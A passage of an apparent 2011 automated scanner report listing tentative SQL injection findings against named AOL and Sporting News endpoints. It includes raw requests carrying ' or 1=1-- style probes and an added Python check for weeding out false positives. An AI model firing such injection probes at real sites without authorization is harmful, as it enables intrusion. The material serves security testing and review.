#fs.ad-180x150 td.rank { width:5px; }
#fs.ad-180x150 .more-link { margin:4px 5px 0 0; }
#fs.ad-180x150 .more-link a { font-size:10px; }
#fs.ad-180x150 a.fs-logo { width:180px; height:45px; top:105px; }
</style>
<div id="fs" class="ad-180x15029246186' or 1=2-- ">
<h1>Fantasy Baseball Overall Rankings</h1>
<table>
<tr>
<th>Rk</th>
<th>Player</th>
<th>Pos</th>
<th>Tm</th>
</tr>
<tr>
<td class="rank">1</td>
<td><a href="http://fantasysource.sporti
...[SNIP]...
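The two pairs above show why the report's own caveat about difference-based tests matters. In 1.1 the two homepage responses differ in a rotating promo block ("SPORTING NEWS FAN SHOP" against "FANTASY SOURCE BASEBALL") and in a counting-down `Cache-Control: max-age`, neither of which says anything about a database. In 1.2 the payload is echoed verbatim into the stylesheet and the `class` attribute, so those lines differ between `1=1` and `1=2` by construction, and only what remains after discounting the echo can be attributed to the backend. The following is an added example, not part of the report: a manual-confirmation check that fetches a few baselines with a harmless value, treats whatever varies between them as noise, masks the echoed payload, and only then compares the boolean pair. The responses are constructed to mimic the two patterns, not the captured ones.

```python
import difflib

# Constructed responses modelled on the 1.1 and 1.2 pairs; not real captures.
PROMOS = ["<h2>SPORTING NEWS FAN SHOP</h2>", "<h2>FANTASY SOURCE BASEBALL</h2>"]
TRUE_PAYLOAD = "' or 1=1-- "
FALSE_PAYLOAD = "' or 1=2-- "


def http(headers, body_lines):
    return "\r\n".join(["HTTP/1.1 200 OK"] + headers) + "\r\n\r\n" + "\n".join(body_lines)


def render_homepage(promo_index, max_age):
    """1.1 pattern: a rotating promo and a max-age that counts down."""
    return http(["Content-Type: text/html", f"Cache-Control: max-age={max_age}"],
                ["<!DOCTYPE html>", '<div class="promo">', PROMOS[promo_index], "</div>",
                 '<form id="header-search" method="get" action="/search">', "</form>"])


def render_widget(dimension, rows):
    """1.2 pattern: the dimension value is echoed into CSS and a class attribute."""
    return http(["Content-Type: text/html", "Cache-Control: max-age=300"],
                [f"#fs {{ background:url(mlb-ad-bg-{dimension}.jpg) no-repeat; }}",
                 f'<div id="fs" class="ad-{dimension}">']
                + [f"<td>{r}</td>" for r in rows] + ["</div>"])


def body_of(response):
    """Headers such as Date and Cache-Control change on every fetch, so only
    the body takes part in the comparison."""
    return response.split("\r\n\r\n", 1)[1].splitlines()


def noisy_lines(baselines):
    """Body lines that differ between repeated fetches with a harmless value
    are dynamic content (promo rotation, counters) and are excluded."""
    noise = set()
    ref = body_of(baselines[0])
    for other in baselines[1:]:
        cur = body_of(other)
        for tag, i1, i2, j1, j2 in difflib.SequenceMatcher(None, ref, cur).get_opcodes():
            if tag != "equal":
                noise.update(ref[i1:i2])
                noise.update(cur[j1:j2])
    return noise


def normalise(response, payload, noise):
    """Drop known-noisy lines, then mask the echoed payload so reflection
    alone cannot make the two conditions look different."""
    return [ln.replace(payload, "<PAYLOAD>") for ln in body_of(response) if ln not in noise]


def boolean_pair_differs(baselines, true_response, false_response):
    """True only if the 1=1 / 1=2 responses still differ once rotating content
    and the reflected payload are discounted."""
    noise = noisy_lines(baselines)
    return (normalise(true_response, TRUE_PAYLOAD, noise)
            != normalise(false_response, FALSE_PAYLOAD, noise))


def homepage_scenario():
    """Returns (naive byte comparison, normalised comparison) for the 1.1 pattern."""
    baselines = [render_homepage(0, 30), render_homepage(1, 29), render_homepage(0, 28)]
    true_resp, false_resp = render_homepage(0, 30), render_homepage(1, 28)
    return true_resp != false_resp, boolean_pair_differs(baselines, true_resp, false_resp)


def widget_echo_scenario():
    """1.2 pattern with a backend that ignores the boolean: only the echo differs."""
    rows = ["Player A", "Player B", "Player C"]
    baselines = [render_widget("180x150", rows), render_widget("180x150", rows)]
    true_resp = render_widget("180x150" + TRUE_PAYLOAD, rows)
    false_resp = render_widget("180x150" + FALSE_PAYLOAD, rows)
    return true_resp != false_resp, boolean_pair_differs(baselines, true_resp, false_resp)


def widget_injectable_scenario():
    """A backend that really evaluates the boolean: 1=1 leaks extra rows."""
    rows = ["Player A", "Player B", "Player C"]
    baselines = [render_widget("180x150", rows), render_widget("180x150", rows)]
    true_resp = render_widget("180x150" + TRUE_PAYLOAD, rows + ["Player D", "Player E"])
    false_resp = render_widget("180x150" + FALSE_PAYLOAD, rows)
    return true_resp != false_resp, boolean_pair_differs(baselines, true_resp, false_resp)
```

In the first two scenarios the naive comparison fires while the normalised one does not; only the third, where the row set actually changes with the injected condition, survives. The baseline step is the part worth copying into a manual review: request the page several times with an innocuous value before trusting any single `1=1` versus `1=2` difference, and treat anything that already varies between those fetches as irrelevant to the injection question.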

1.3. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php [limit parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://aol.sportingnews.com
Path:   /services/fantasy_source_rankings_ad.php

Issue detail

The limit parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the limit parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /services/fantasy_source_rankings_ad.php?sport=mlb&dimension=180x150&limit=3'%20and%201%3d1--%20 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575176918-New%7C1367647176918%3B%20s_nrgvo%3DNew%7C1367647176919%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 01:30:00 GMT
Cache-Control: max-age=300
Date: Thu, 05 May 2011 01:32:33 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 4376

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #fs * { margin:0; padding:0; line-height:1em; font-family:arial,sans-serif; font-s
...[SNIP]...
<a href="http://fantasysource.sportingnews.com/baseball/player/7172/dan-haren" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Dan Haren</a></td>
<td>SP</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/3/los-angeles-angels" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">LAA</a></td>
</tr>
<tr class="alt">
<td class="rank">2</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/8180/clayton-kershaw" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Clayton Kershaw</a></td>
<td>SP</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/19/los-angeles-dodgers" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">LAD</a></td>
</tr>
<tr>
<td class="rank">3</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/7790/jon-lester" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Jon Lester</a></td>
<td>SP</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/2/boston-red-sox" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">Bos</a></td>
</tr>
</table>
<div class="more-link"><a href="http://fantasysource.sportingnews.com/baseball/rankings?pagetype=SP" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | see full');">See Full Top SP Rankings</a></div>
<a href="http://fantasysource.sportingnews.com/baseball/home" class="fs-logo" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | logo');"></a>
...[SNIP]...

Request 2

GET /services/fantasy_source_rankings_ad.php?sport=mlb&dimension=180x150&limit=3'%20and%201%3d2--%20 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575176918-New%7C1367647176918%3B%20s_nrgvo%3DNew%7C1367647176919%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 01:30:00 GMT
Cache-Control: max-age=300
Date: Thu, 05 May 2011 01:32:34 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 4386

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #fs * { margin:0; padding:0; line-height:1em; font-family:arial,sans-serif; font-s
...[SNIP]...
<a href="http://fantasysource.sportingnews.com/baseball/player/5737/vladimir-guerrero" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Vladimir Guerrero</a></td>
<td>DH</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/1/baltimore-orioles" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">Bal</a></td>
</tr>
<tr class="alt">
<td class="rank">2</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/5909/david-ortiz" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">David Ortiz</a></td>
<td>DH</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/2/boston-red-sox" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">Bos</a></td>
</tr>
<tr>
<td class="rank">3</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/6980/travis-hafner" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Travis Hafner</a></td>
<td>DH</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/5/cleveland-indians" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">Cle</a></td>
</tr>
</table>
<div class="more-link"><a href="http://fantasysource.sportingnews.com/baseball/rankings?pagetype=DH" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | see full');">See Full Top DH Rankings</a></div>
<a href="http://fantasysource.sportingnews.com/baseball/home" class="fs-logo" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | log
...[SNIP]...

1.4. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://aol.sportingnews.com
Path:   /services/fantasy_source_rankings_ad.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 87821652%20or%201%3d1--%20 and 87821652%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /services/fantasy_source_rankings_ad.php?sport=mlb&dimension=180x150&lim/187821652%20or%201%3d1--%20it=3 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575176918-New%7C1367647176918%3B%20s_nrgvo%3DNew%7C1367647176919%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 01:30:00 GMT
Cache-Control: max-age=300
Date: Thu, 05 May 2011 01:32:46 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 5497

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #fs * { margin:0; padding:0; line-height:1em; font-family:arial,sans-serif; font-s
...[SNIP]...
<h1>Fantasy Baseball DH Rankings</h1>
<table>
<tr>
<th>Rk</th>
<th>Player</th>
<th>Pos</th>
<th>Tm</th>
</tr>
<tr>
<td class="rank">1</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/5737/vladimir-guerrero" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Vladimir Guerrero</a></td>
<td>DH</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/1/baltimore-orioles" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">Bal</a></td>
</tr>
<tr class="alt">
<td class="rank">2</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/5909/david-ortiz" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">David Ortiz</a></td>
<td>DH</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/2/boston-red-sox" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">Bos</a></td>
</tr>
<tr>
<td class="rank">3</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/6980/travis-hafner" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Travis Hafner</a></td>
<td>DH</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/5/cleveland-indians" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">Cle</a></td>
</tr>
<tr class="alt">
<td class="rank">4</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/playe
...[SNIP]...

Request 2

GET /services/fantasy_source_rankings_ad.php?sport=mlb&dimension=180x150&lim/187821652%20or%201%3d2--%20it=3 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575176918-New%7C1367647176918%3B%20s_nrgvo%3DNew%7C1367647176919%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 01:30:00 GMT
Cache-Control: max-age=300
Date: Thu, 05 May 2011 01:32:46 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 5513

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #fs * { margin:0; padding:0; line-height:1em; font-family:arial,sans-serif; font-s
...[SNIP]...
<h1>Fantasy Baseball Overall Rankings</h1>
<table>
<tr>
<th>Rk</th>
<th>Player</th>
<th>Pos</th>
<th>Tm</th>
</tr>
<tr>
<td class="rank">1</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/6619/albert-pujols" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Albert Pujols</a></td>
<td>1B</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/24/st-louis-cardinals" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">StL</a></td>
</tr>
<tr class="alt">
<td class="rank">2</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/7488/hanley-ramirez" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Hanley Ramirez</a></td>
<td>SS</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/28/florida-marlins" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">Fla</a></td>
</tr>
<tr>
<td class="rank">3</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/player/7946/joey-votto" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | player');">Joey Votto</a></td>
<td>1B</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/team/17/cincinnati-reds" target="_top" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | FS Baseball | 180x150 | team');">Cin</a></td>
</tr>
<tr class="alt">
<td class="rank">4</td>
<td><a href="http://fantasysource.sportingnews.com/baseball/playe
...[SNIP]...

1.5. http://aol.sportingnews.com/services/sn-promos/yearbooks.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://aol.sportingnews.com
Path:   /services/sn-promos/yearbooks.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 13762307%20or%201%3d1--%20 and 13762307%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /services/sn-promos/yearbooks.php?113762307%20or%201%3d1--%20=1 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575176918-New%7C1367647176918%3B%20s_nrgvo%3DNew%7C1367647176919%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 01:30:00 GMT
Cache-Control: max-age=295
Date: Thu, 05 May 2011 01:31:59 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 1331

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #yearbooks * { margin:0; padding:0; line-height:1em; }
#yearbooks, #yearbooks a { display:block; width:180px; height:150px; overflow:hidden; }
#yearbooks .middle { width:100%; height:100%; background:url(http://st.snimg.com/image/promos/yearbooks/2011-pro-football-draft-guide-bg-180x150.png) no-repeat; }
#yearbooks .top { position:absolute; top:0; left:0; }
#yearbooks img.cover { margin:25px 0 0 12px; }
#yearbooks img.fade { margin:-50px 0 0 8px; }
#yearbooks a { position:absolute; top:0; left;:0; background:#fff; opacity:0; filter:alpha(opacity=0); }
</style>
<div id="yearbooks" class="ad-180x150">
<div class="middle">
<img src="http://st.snimg.com/image/yearbooks/pro-football-draft-guide/2011/2011Draft1-w100.jpg" class="cover" /><br />
<img src="http://st.snimg.com/image/promos/bg-fade-black.png" class="fade" />
<div class="top"><img src="http://st.snimg.com/image/promos/yearbooks/top-180x150.png" /></div>
</div>
<a href="https://www.streetandsmiths.com/index.cfm?fuseaction=store.covers&catid=7&year=2011" target="_blank" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | Pro Football Draft Guide Yearbook | 180x150');"></a>
</div>

Request 2

GET /services/sn-promos/yearbooks.php?113762307%20or%201%3d2--%20=1 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575176918-New%7C1367647176918%3B%20s_nrgvo%3DNew%7C1367647176919%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 01:30:00 GMT
Cache-Control: max-age=300
Date: Thu, 05 May 2011 01:31:59 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 1280

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #yearbooks * { margin:0; padding:0; line-height:1em; }
#yearbooks, #yearbooks a { display:block; width:180px; height:150px; overflow:hidden; }
#yearbooks .middle { width:100%; height:100%; background:url(http://st.snimg.com/image/promos/yearbooks/2011-baseball-bg-180x150.png) no-repeat; }
#yearbooks .top { position:absolute; top:0; left:0; }
#yearbooks img.cover { margin:25px 0 0 12px; }
#yearbooks img.fade { margin:-50px 0 0 8px; }
#yearbooks a { position:absolute; top:0; left;:0; background:#fff; opacity:0; filter:alpha(opacity=0); }
</style>
<div id="yearbooks" class="ad-180x150">
<div class="middle">
<img src="http://st.snimg.com/image/yearbooks/baseball/2011/2011BB5-w100.jpg" class="cover" /><br />
<img src="http://st.snimg.com/image/promos/bg-fade-black.png" class="fade" />
<div class="top"><img src="http://st.snimg.com/image/promos/yearbooks/top-180x150.png" /></div>
</div>
<a href="https://www.streetandsmiths.com/index.cfm?fuseaction=store.covers&catid=1&year=2011" target="_blank" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | Baseball Yearbook | 180x150');"></a>
</div>

1.6. http://o.aolcdn.com/os/fanhouse/design/v2/css/fanhouse.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://o.aolcdn.com
Path:   /os/fanhouse/design/v2/css/fanhouse.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 17216175'%20or%201%3d1--%20 and 17216175'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /os/fanhouse17216175'%20or%201%3d1--%20/design/v2/css/fanhouse.css?version=172 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 14 Apr 2010 18:22:52 GMT
Content-Type: image/gif
Content-Length: 3488
Cache-Control: public, max-age=94670778
Expires: Sun, 04 May 2014 18:36:02 GMT
Date: Thu, 05 May 2011 01:09:44 GMT
Connection: close

GIF89ax.Z.....3f3.3f3f.f.........333fff.....333ff.......3.3f3f.f........f...33...3..fff3..f......f3..f3..f...3...33.fff33.ff...............fff333............................................................,....x.Z......pH,....r.l:...tJ.Z...v..z...xL.....
...V,..M....J}E.Aqs|h.B(&.D...Dwx+p+.c    '.(....%..%%).$.+#)#xq.p,.X.......&(...........x..q).S.&..)).).&........%$..,p., .Ip*..(.$.........(......%.a..h......b.N..d.T...p..[........P..e... ..,*.......yFx..    .F..p....C...%O".s..2.-.....d..(S...q..9.........F4.$.@.rr..y..A..O.A../.?..H..9.....&bhZ...q.
....RR?......-..(Ax%A....?...X........d.P.VMY.8....b
..TP...?.?..d6...*O%?Eq....4.R{.A..+a.4..bA....Vy......QKAK....)...J9x.FW._...p.$...
....
...J[K........gc...d..b.
....B...B.......-Y..k,,..J..'.p........O=....tj...k....X*H4#....T.........O0.Pw.[.1U.D.0y.s...RB..".y....CI=..k#|8.
.#.
.$w.\..$.R.    V%    >j).    .<e._*d.A....!    x...pQ..T1.^.Iw.u`..Bh..d...W...'.X0...v.....u..#..`..x..D)....Y...$....5gk......a.U$x......:.D...!$....[.n.E.p)$..    . [&$.a.a.d...Z.v..q)..\z>6.K/...[+...!...{...)f.u0E..[......f..t...c.3.:jJ-.{.vN5..l..@........&.as.}.G.H...R.M...@...6."..F...$.+...)........f$..y
..N.I    ..$....bwG..+...+.X+.....J..`{O..."...^~...Wu...t..b....G^a.~..jf..P    *.2..*q....tP.f.~........{...hnF.L: ...    Y/906.........a../..^.$.W...0...d..@.?.!.E.i.x<...R..B
.^7Y..e...~..k.....4!.h....(......hhl."F$.U.u. ...
..U..h.'....@#..Le...........8.X.ST.    .....+[..C..p..U.B..e.%AJX..) `..8E....nl...-@..0Z.b..@..9..B.e%........f.R..8.,......3.%..04...*...a .&...#.1.j....H$....hp.*
L.S.@..t    .!sF0.,..\.@.....i.#nz.......BKB,.Q..X...&tZ[..u.O2+,...(....Y.s........UF.T.b.V.....W>.$...2.    -D.t..2....-%R..\....X.p...J...q..@.h..&r.~..4*.......h.0fI.n4&.b.$..C.P^"..6sW.....Y.    .R9a#.
...[SNIP]...

Request 2

GET /os/fanhouse17216175'%20or%201%3d2--%20/design/v2/css/fanhouse.css?version=172 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
